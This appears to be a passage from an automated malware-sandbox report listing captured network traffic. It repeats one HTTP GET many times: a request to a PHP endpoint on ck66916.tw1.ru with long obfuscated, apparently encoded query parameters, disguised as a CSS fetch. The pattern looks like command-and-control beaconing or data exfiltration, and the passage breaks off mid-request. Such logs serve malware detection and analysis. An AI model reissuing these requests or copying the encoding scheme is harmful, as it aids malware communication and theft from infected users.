/L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ